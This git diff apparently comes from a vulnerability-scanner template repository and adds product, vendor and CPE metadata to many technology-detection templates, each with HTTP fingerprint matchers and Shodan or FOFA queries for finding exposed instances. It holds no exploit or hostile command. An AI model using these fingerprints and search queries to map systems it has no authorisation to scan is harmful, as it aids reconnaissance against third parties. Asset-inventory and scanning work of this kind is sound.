@@ -35,4 +39,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502207cd8124890550ff38ab6b1d02a3c17e0c9d6caace23b7b4fa1f0a0c7c1cae777022100d57a340eb62ed44b815752fc532b652b8a782c1dbe959bc4d24254fe212e7053:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207cd8124890550ff38ab6b1d02a3c17e0c9d6caace23b7b4fa1f0a0c7c1cae777022100d57a340eb62ed44b815752fc532b652b8a782c1dbe959bc4d24254fe212e7053:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/boa-web-server.yaml b/http/technologies/boa-web-server.yaml
index bbc722cf0f..2793d18021 100644
--- a/http/technologies/boa-web-server.yaml
+++ b/http/technologies/boa-web-server.yaml
@@ -12,10 +12,13 @@ info:
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
+ cpe: cpe:2.3:a:boa:boa:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: "Server: Boa/"
+ product: boa
+ vendor: boa
tags: boa,tech
http:
@@ -35,4 +38,4 @@ http:
part: header
kval:
- Server
-# digest: 490a0046304402202a45b52e578317f8965b3218167ea6f362a161e3ed98fefecbfeaaa2e89c675f02206b2c6c1ebe181ea4ae0b9cb785c87469ec83eb9b1df2f45bcb13ed52c33c46a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202a45b52e578317f8965b3218167ea6f362a161e3ed98fefecbfeaaa2e89c675f02206b2c6c1ebe181ea4ae0b9cb785c87469ec83eb9b1df2f45bcb13ed52c33c46a7:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/burp-collaborator-detect.yaml b/http/technologies/burp-collaborator-detect.yaml
index c63c2ce4f1..fe4d8e7efb 100644
--- a/http/technologies/burp-collaborator-detect.yaml
+++ b/http/technologies/burp-collaborator-detect.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
+ cpe: cpe:2.3:a:portswigger:burp_suite:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: "Server: Burp Collaborator"
+ product: burp_suite
+ vendor: portswigger
tags: burp,tech,detect
http:
diff --git a/http/technologies/casaos-detection.yaml b/http/technologies/casaos-detection.yaml
index a4cd8658c9..b783015182 100644
--- a/http/technologies/casaos-detection.yaml
+++ b/http/technologies/casaos-detection.yaml
@@ -10,8 +10,12 @@ info:
max-request: 1
shodan-query: http.html:"/CasaOS-UI/public/index.html"
fofa-query: body="/CasaOS-UI/public/index.html"
+ product: casaos
+ vendor: icewhale
tags: casaos,tech,oss
+ classification:
+ cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/checkpoint-mobile-detect.yaml b/http/technologies/checkpoint-mobile-detect.yaml
index 2019f75869..dc31d73f8b 100644
--- a/http/technologies/checkpoint-mobile-detect.yaml
+++ b/http/technologies/checkpoint-mobile-detect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"Check Point Mobile"
+ product: mobile_access_portal_agent
+ vendor: checkpoint
tags: panel,checkpoint,detect
+ classification:
+ cpe: cpe:2.3:a:checkpoint:mobile_access_portal_agent:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/chevereto-detect.yaml b/http/technologies/chevereto-detect.yaml
index 58c806d34a..56a8aeb450 100644
--- a/http/technologies/chevereto-detect.yaml
+++ b/http/technologies/chevereto-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Centreon"
+ product: chevereto
+ vendor: chevereto
tags: tech,chevereto
+ classification:
+ cpe: cpe:2.3:a:chevereto:chevereto:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/citrix-hypervisor-page.yaml b/http/technologies/citrix-hypervisor-page.yaml
index e2da99ff1b..eb14c6f599 100644
--- a/http/technologies/citrix-hypervisor-page.yaml
+++ b/http/technologies/citrix-hypervisor-page.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: http.title:"Welcome to Citrix Hypervisor"
+ product: hypervisor
+ vendor: citrix
tags: tech,citrix,default-page
+ classification:
+ cpe: cpe:2.3:o:citrix:hypervisor:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/citrix-xenmobile-version.yaml b/http/technologies/citrix-xenmobile-version.yaml
index 096465a313..5ea6e0b03d 100644
--- a/http/technologies/citrix-xenmobile-version.yaml
+++ b/http/technologies/citrix-xenmobile-version.yaml
@@ -10,8 +10,12 @@ info:
verified: true
max-request: 2
shodan-query: "title:\"XenMobile - Console\""
+ product: xenmobile_server
+ vendor: citrix
tags: tech,edb,citrix,version,detect
+ classification:
+ cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:*
flow: http(1) && http(2)
http:
@@ -49,4 +53,4 @@ http:
group: 1
regex:
- 'v=([^"]+)'
-# digest: 4a0a00473045022100c40bea9cbdb42f2cf6c1b737a80bb2c695f0c77d720adbb6001c3acdb534e74002207275f0e0528ef6bac4cd2ac049c3a16605635c2ac0ee65b2efc725abedc44bf9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c40bea9cbdb42f2cf6c1b737a80bb2c695f0c77d720adbb6001c3acdb534e74002207275f0e0528ef6bac4cd2ac049c3a16605635c2ac0ee65b2efc725abedc44bf9:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/connectwise-control-detect.yaml b/http/technologies/connectwise-control-detect.yaml
index 1c30ec9bd2..37c8c9cc08 100644
--- a/http/technologies/connectwise-control-detect.yaml
+++ b/http/technologies/connectwise-control-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: title="ConnectWise Control Remote Support Software"
+ product: control
+ vendor: connectwise
tags: tech,connectwise
+ classification:
+ cpe: cpe:2.3:a:connectwise:control:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/couchbase-sync-gateway.yaml b/http/technologies/couchbase-sync-gateway.yaml
index 22a88c108c..605a41bca5 100644
--- a/http/technologies/couchbase-sync-gateway.yaml
+++ b/http/technologies/couchbase-sync-gateway.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: html:"Couchbase Sync Gateway"
+ product: sync_gateway
+ vendor: couchbase
tags: tech,couchbase
+ classification:
+ cpe: cpe:2.3:a:couchbase:sync_gateway:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/craftercms-detect.yaml b/http/technologies/craftercms-detect.yaml
index 0823d1fb7c..d1281aefae 100644
--- a/http/technologies/craftercms-detect.yaml
+++ b/http/technologies/craftercms-detect.yaml
@@ -1,5 +1,5 @@
-id: craftercms-detect
-
+id: craftercms-detect
+
info:
name: CrafterCMS - Detect
author: righettod
@@ -12,25 +12,29 @@ info:
verified: true
max-request: 1
shodan-query: http.title:"craftercms"
+ product: crafter_cms
+ vendor: craftercms
tags: tech,craftercms,detect
-http:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- host-redirects: true
- max-redirects: 2
- matchers:
- - type: word
- part: header
- words:
- - 'CrafterCMS'
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
+ classification:
+ cpe: cpe:2.3:a:craftercms:crafter_cms:*:*:*:*:*:*:*:*
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ host-redirects: true
+ max-redirects: 2
+ matchers:
+ - type: word
+ part: header
+ words:
+ - 'CrafterCMS'
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
- 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter'
-# digest: 4b0a00483046022100e458cbb4bdc3e20cec88b73b90c65c423765ccfd6cca34c7dd45072194e4c22a022100ddbef9284a10c6b0f7d5940e7130502f5361cf2deb8483b5755d88dc8e3dda39:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e458cbb4bdc3e20cec88b73b90c65c423765ccfd6cca34c7dd45072194e4c22a022100ddbef9284a10c6b0f7d5940e7130502f5361cf2deb8483b5755d88dc8e3dda39:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/cvsweb-detect.yaml b/http/technologies/cvsweb-detect.yaml
index 3a94bf7c33..9625f9eaf2 100644
--- a/http/technologies/cvsweb-detect.yaml
+++ b/http/technologies/cvsweb-detect.yaml
@@ -14,8 +14,12 @@ info:
shodan-query: title:"cvsweb"
fofa-query: title="cvsweb"
zoomeye-query: title:cvsweb
+ product: cvsweb
+ vendor: freebsd
tags: tech,cvsweb,detect
+ classification:
+ cpe: cpe:2.3:a:freebsd:cvsweb:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/dash-panel-detect.yaml b/http/technologies/dash-panel-detect.yaml
index 693b1260f9..10ceca67b9 100644
--- a/http/technologies/dash-panel-detect.yaml
+++ b/http/technologies/dash-panel-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: html:"DashRenderer"
+ product: dash_core
+ vendor: dash
tags: tech,dash
+ classification:
+ cpe: cpe:2.3:a:dash:dash_core:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/dedecms-detect.yaml b/http/technologies/dedecms-detect.yaml
index 306d937e77..aa51d9a71a 100644
--- a/http/technologies/dedecms-detect.yaml
+++ b/http/technologies/dedecms-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 2
shodan-query: title:"dedecms" || http.html:"power by dedecms"
+ product: dedecms
+ vendor: dedecms
tags: dedecms,tech
+ classification:
+ cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-apache-shiro.yaml b/http/technologies/default-apache-shiro.yaml
index 259a94706c..cd23f7f24e 100644
--- a/http/technologies/default-apache-shiro.yaml
+++ b/http/technologies/default-apache-shiro.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"Apache Shiro Quickstart"
+ product: shiro
+ vendor: apache
tags: tech,apache,shiro
+ classification:
+ cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-cakephp-page.yaml b/http/technologies/default-cakephp-page.yaml
index 19435121b5..1ae6dc709e 100644
--- a/http/technologies/default-cakephp-page.yaml
+++ b/http/technologies/default-cakephp-page.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: html:"Welcome to CakePHP"
+ product: cakephp
+ vendor: cakephp
tags: tech,cakephp,default-page
+ classification:
+ cpe: cpe:2.3:a:cakephp:cakephp:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-codeigniter-page.yaml b/http/technologies/default-codeigniter-page.yaml
index 03415da1ef..fdff67ed7b 100644
--- a/http/technologies/default-codeigniter-page.yaml
+++ b/http/technologies/default-codeigniter-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Welcome to CodeIgniter"
+ product: codeigniter
+ vendor: codeigniter
tags: tech,codeigniter
+ classification:
+ cpe: cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-django-page.yaml b/http/technologies/default-django-page.yaml
index c471eebc93..6218f685ba 100644
--- a/http/technologies/default-django-page.yaml
+++ b/http/technologies/default-django-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"The install worked successfully! Congratulations!"
+ product: django
+ vendor: djangoproject
tags: tech,django
+ classification:
+ cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-fastcgi-page.yaml b/http/technologies/default-fastcgi-page.yaml
index bbfcd663c1..3253bcd23e 100644
--- a/http/technologies/default-fastcgi-page.yaml
+++ b/http/technologies/default-fastcgi-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"FastCGI"
+ product: fcgi
+ vendor: fastcgi
tags: tech,fastcgi
+ classification:
+ cpe: cpe:2.3:a:fastcgi:fcgi:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-fedora-page.yaml b/http/technologies/default-fedora-page.yaml
index 07ecac5017..d77cfeadbc 100644
--- a/http/technologies/default-fedora-page.yaml
+++ b/http/technologies/default-fedora-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Test Page for the HTTP Server on Fedora"
+ product: fedora
+ vendor: fedoraproject
tags: tech,fedora
+ classification:
+ cpe: cpe:2.3:o:fedoraproject:fedora:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-glassfish-server-page.yaml b/http/technologies/default-glassfish-server-page.yaml
index 0c384cbc07..853900b5e5 100644
--- a/http/technologies/default-glassfish-server-page.yaml
+++ b/http/technologies/default-glassfish-server-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"GlassFish Server - Server Running"
+ product: glassfish_server
+ vendor: oracle
tags: tech,glassfish
+ classification:
+ cpe: cpe:2.3:a:oracle:glassfish_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -27,4 +31,4 @@ http:
group: 1
regex:
- 'GlassFish\s+Server\s+([A-Za-z0-9\s.]+)(\n|\r)'
-# digest: 4a0a00473045022060aa5b4e6c78b2d5c364211a1ca4ecba6f63f83702136b580e80a8813fc40395022100de1a55dc578acda9cf937456c406ab3013711c66ea2a236d8c957cc4e5937fb2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022060aa5b4e6c78b2d5c364211a1ca4ecba6f63f83702136b580e80a8813fc40395022100de1a55dc578acda9cf937456c406ab3013711c66ea2a236d8c957cc4e5937fb2:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/default-jetty-page.yaml b/http/technologies/default-jetty-page.yaml
index 5df2cdc2ee..7a4fe3ccac 100644
--- a/http/technologies/default-jetty-page.yaml
+++ b/http/technologies/default-jetty-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Powered By Jetty"
+ product: jetty
+ vendor: eclipse
tags: tech,jetty
+ classification:
+ cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-lighttpd-page.yaml b/http/technologies/default-lighttpd-page.yaml
index deeb3bf63f..5018ad8e07 100644
--- a/http/technologies/default-lighttpd-page.yaml
+++ b/http/technologies/default-lighttpd-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Powered by lighttpd"
+ product: lighttpd
+ vendor: lighttpd
tags: tech,lighttpd
+ classification:
+ cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-lighttpd-placeholder-page.yaml b/http/technologies/default-lighttpd-placeholder-page.yaml
index 8fd1aeb980..c8e84f9d3d 100644
--- a/http/technologies/default-lighttpd-placeholder-page.yaml
+++ b/http/technologies/default-lighttpd-placeholder-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: "If you find a bug in this Lighttpd package, or in Lighttpd itself"
+ product: lighttpd
+ vendor: lighttpd
tags: tech,lighttpd
+ classification:
+ cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-movable-page.yaml b/http/technologies/default-movable-page.yaml
index 51263b39af..9ccc875f22 100644
--- a/http/technologies/default-movable-page.yaml
+++ b/http/technologies/default-movable-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: title:"Welcome to Movable Type"
+ product: movable_type
+ vendor: sixapart
tags: tech,movable
+ classification:
+ cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-openresty.yaml b/http/technologies/default-openresty.yaml
index 81f007e289..a092058f93 100644
--- a/http/technologies/default-openresty.yaml
+++ b/http/technologies/default-openresty.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Welcome to OpenResty!"
+ product: openresty
+ vendor: openresty
tags: tech,openresty
+ classification:
+ cpe: cpe:2.3:a:openresty:openresty:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-parallels-plesk.yaml b/http/technologies/default-parallels-plesk.yaml
index 691e20c3e6..e14c8839d0 100644
--- a/http/technologies/default-parallels-plesk.yaml
+++ b/http/technologies/default-parallels-plesk.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"Default Parallels Plesk Panel Page"
+ product: parallels_plesk_panel
+ vendor: parallels
tags: tech,default-page,parallels,plesk
+ classification:
+ cpe: cpe:2.3:a:parallels:parallels_plesk_panel:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-payara-server-page.yaml b/http/technologies/default-payara-server-page.yaml
index 8d5f2afd3a..2ed4b84138 100644
--- a/http/technologies/default-payara-server-page.yaml
+++ b/http/technologies/default-payara-server-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Payara Server - Server Running"
+ product: payara
+ vendor: payara
tags: tech,payara
+ classification:
+ cpe: cpe:2.3:a:payara:payara:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-plesk-page.yaml b/http/technologies/default-plesk-page.yaml
index 34a74e256b..fea9338d75 100644
--- a/http/technologies/default-plesk-page.yaml
+++ b/http/technologies/default-plesk-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Web Server's Default Page"
+ product: plesk
+ vendor: plesk
tags: tech,plesk
+ classification:
+ cpe: cpe:2.3:a:plesk:plesk:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-redhat-test-page.yaml b/http/technologies/default-redhat-test-page.yaml
index 518c8f746f..31132dadd3 100644
--- a/http/technologies/default-redhat-test-page.yaml
+++ b/http/technologies/default-redhat-test-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Test Page for the Apache HTTP Server on Red Hat Enterprise Linux"
+ product: enterprise_linux_server
+ vendor: redhat
tags: tech,redhat
+ classification:
+ cpe: cpe:2.3:o:redhat:enterprise_linux_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-sitecore-page.yaml b/http/technologies/default-sitecore-page.yaml
index 4a3d8850ca..e3ac33528e 100644
--- a/http/technologies/default-sitecore-page.yaml
+++ b/http/technologies/default-sitecore-page.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: http.title:"Welcome to Sitecore"
+ product: experience_platform
+ vendor: sitecore
tags: tech,sitecore,cms
+ classification:
+ cpe: cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-ssltls-test-page.yaml b/http/technologies/default-ssltls-test-page.yaml
index 610d1612ef..b58249d4ec 100644
--- a/http/technologies/default-ssltls-test-page.yaml
+++ b/http/technologies/default-ssltls-test-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Test Page for the SSL/TLS-aware Apache Installation on Web Site"
+ product: http_server
+ vendor: apache
tags: tech,ssltls
+ classification:
+ cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-symfony-page.yaml b/http/technologies/default-symfony-page.yaml
index cd123d676d..ea896920f9 100644
--- a/http/technologies/default-symfony-page.yaml
+++ b/http/technologies/default-symfony-page.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: http.title:"Welcome to Symfony"
+ product: symfony
+ vendor: sensiolabs
tags: tech,symfony,default-page
+ classification:
+ cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-tengine-page.yaml b/http/technologies/default-tengine-page.yaml
index fc1012ee9c..80473654b3 100644
--- a/http/technologies/default-tengine-page.yaml
+++ b/http/technologies/default-tengine-page.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: http.title:"Welcome to tengine"
+ product: tengine
+ vendor: alibaba
tags: tech,tengine,default-page
+ classification:
+ cpe: cpe:2.3:a:alibaba:tengine:*:*:*:*:nginx:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-websphere-liberty.yaml b/http/technologies/default-websphere-liberty.yaml
index 44a3acb8ec..ae95a2ad4a 100644
--- a/http/technologies/default-websphere-liberty.yaml
+++ b/http/technologies/default-websphere-liberty.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: http.title:"WebSphere Liberty"
+ product: websphere_liberty
+ vendor: ibm
tags: tech,websphere,liberty
+ classification:
+ cpe: cpe:2.3:a:ibm:websphere_liberty:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/devexpress-detect.yaml b/http/technologies/devexpress-detect.yaml
index bb75a25835..096bbe0aff 100644
--- a/http/technologies/devexpress-detect.yaml
+++ b/http/technologies/devexpress-detect.yaml
@@ -12,8 +12,12 @@ info:
metadata:
max-request: 1
shodan-query: html:"DXR.axd"
+ product: devexpress_components
+ vendor: devexpress
tags: devexpress,iis,microsoft,asp,tech
+ classification:
+ cpe: cpe:2.3:a:devexpress:devexpress_components:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -26,4 +30,4 @@ http:
part: body
words:
- "DXR.axd"
-# digest: 4a0a00473045022100e6b541bb707f808e2619e24fee2f542be9a9cbd19eb02851ba751615a5021d88022068d3b18cffac63e834595feb95fef57ed70a2bcd4b9ff6f29df6d6878426b6a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e6b541bb707f808e2619e24fee2f542be9a9cbd19eb02851ba751615a5021d88022068d3b18cffac63e834595feb95fef57ed70a2bcd4b9ff6f29df6d6878426b6a1:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/directus-detect.yaml b/http/technologies/directus-detect.yaml
index beb38c3cd5..aae33ae88b 100644
--- a/http/technologies/directus-detect.yaml
+++ b/http/technologies/directus-detect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
google-query: 'X-Powered-By: Directus'
+ product: directus
+ vendor: monospace
tags: tech,directus,detect
+ classification:
+ cpe: cpe:2.3:a:monospace:directus:*:*:*:*:-:*:*:*
http:
- method: GET
path:
@@ -25,4 +29,4 @@ http:
words:
- "X-Powered-By: Directus"
case-insensitive: true
-# digest: 490a0046304402201c1b4978d386631e676b45fc6b59fb4c8ae13b345b464cdd1bfefe5840e2a3800220499da0d0b93930d1a5d080db752255740841748c0e6ea6a3799b81544e071e5d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201c1b4978d386631e676b45fc6b59fb4c8ae13b345b464cdd1bfefe5840e2a3800220499da0d0b93930d1a5d080db752255740841748c0e6ea6a3799b81544e071e5d:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/drupal-detect.yaml b/http/technologies/drupal-detect.yaml
index afa8c8af2f..f62c0840bc 100644
--- a/http/technologies/drupal-detect.yaml
+++ b/http/technologies/drupal-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 3
shodan-query: http.component:"Drupal"
+ product: drupal
+ vendor: drupal
tags: tech,drupal
+ classification:
+ cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/elasticsearch-sql-client-detect.yaml b/http/technologies/elasticsearch-sql-client-detect.yaml
index 1cd75fc9ba..f27ad1cb17 100644
--- a/http/technologies/elasticsearch-sql-client-detect.yaml
+++ b/http/technologies/elasticsearch-sql-client-detect.yaml
@@ -8,8 +8,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Elasticsearch-sql client"
+ product: elasticsearch
+ vendor: elastic
tags: elasticsearch,tech,sql
+ classification:
+ cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/element-web-detect.yaml b/http/technologies/element-web-detect.yaml
index ad7b412929..c4f7bce756 100644
--- a/http/technologies/element-web-detect.yaml
+++ b/http/technologies/element-web-detect.yaml
@@ -9,8 +9,12 @@ info:
verified: true
max-request: 2
shodan-query: html:"manifest.json"
+ product: element
+ vendor: matrix
tags: tech,matrix,element,detect
+ classification:
+ cpe: cpe:2.3:a:matrix:element:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +37,4 @@ http:
part: body
regex:
- '[^\s]+'
-# digest: 4a0a0047304502205410e006bfb51302b79c929988e99705a9fbdcba4f23221cad2c63bc02dc59ce022100ac77e3d22cc46dff3d215d2850f5349cc77bc9ca0700279ee10455163a4795b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205410e006bfb51302b79c929988e99705a9fbdcba4f23221cad2c63bc02dc59ce022100ac77e3d22cc46dff3d215d2850f5349cc77bc9ca0700279ee10455163a4795b1:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/empirecms-detect.yaml b/http/technologies/empirecms-detect.yaml
index bd2fea03e8..9c8a185704 100644
--- a/http/technologies/empirecms-detect.yaml
+++ b/http/technologies/empirecms-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.html:EmpireCMS
+ product: empirecms
+ vendor: phome
tags: tech,empirecms
+ classification:
+ cpe: cpe:2.3:a:phome:empirecms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/gitbook-detect.yaml b/http/technologies/gitbook-detect.yaml
index 83a4953277..de519ca79e 100644
--- a/http/technologies/gitbook-detect.yaml
+++ b/http/technologies/gitbook-detect.yaml
@@ -11,8 +11,12 @@ info:
max-request: 1
shodan-query: http.title:"gitbook"
fofa: app="Introduction-GitBook"
+ product: gitbook
+ vendor: gitbook
tags: tech,gitbook
+ classification:
+ cpe: cpe:2.3:a:gitbook:gitbook:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/glpi-status-page.yaml b/http/technologies/glpi-status-page.yaml
index 19d25dbbd3..610f1afa44 100644
--- a/http/technologies/glpi-status-page.yaml
+++ b/http/technologies/glpi-status-page.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"glpi"
+ product: glpi
+ vendor: glpi-project
tags: tech,status,glpi
+ classification:
+ cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/goliath-detect.yaml b/http/technologies/goliath-detect.yaml
index d5de1bef60..39265f0951 100644
--- a/http/technologies/goliath-detect.yaml
+++ b/http/technologies/goliath-detect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: 'Server: Goliath'
+ product: goliath
+ vendor: goliath_project
tags: tech,goliath
+ classification:
+ cpe: cpe:2.3:a:goliath_project:goliath:*:*:*:*:ruby:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/google/chromecast-detect.yaml b/http/technologies/google/chromecast-detect.yaml
index af7b1bcb74..429c6325ca 100644
--- a/http/technologies/google/chromecast-detect.yaml
+++ b/http/technologies/google/chromecast-detect.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 1
shodan-query: Chromecast
+ product: chromecast
+ vendor: google
tags: google,chromecast,detect
+ classification:
+ cpe: cpe:2.3:h:google:chromecast:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -33,4 +37,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502206c214513406d47d4e688761e11149e983c02c3e47bdfa1f4d01fab2aa15ff11d0221009b017586aea846fc0befea354637be19778ec8c58b0fb2c49e2f28e65855dc2a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206c214513406d47d4e688761e11149e983c02c3e47bdfa1f4d01fab2aa15ff11d0221009b017586aea846fc0befea354637be19778ec8c58b0fb2c49e2f28e65855dc2a:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/graylog/graylog-api-exposure.yaml b/http/technologies/graylog/graylog-api-exposure.yaml
index 62d08209c3..9359e52316 100644
--- a/http/technologies/graylog/graylog-api-exposure.yaml
+++ b/http/technologies/graylog/graylog-api-exposure.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 50
shodan-query: Graylog
+ product: graylog
+ vendor: graylog
tags: tech,graylog,api,swagger,fuzz
+ classification:
+ cpe: cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -88,4 +92,4 @@ http:
- "status_code == 401"
- "contains(header, 'X-Graylog-Node-Id') || contains(header, 'Graylog Server')"
condition: and
-# digest: 4b0a00483046022100cfdfa42b1d6eceea7948a44eebd55448c0553992200628d09080452422232dd7022100a11fdf4e1c293d3669c0923ed6177f2192e0ac22ff1af23651878299747ad7e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
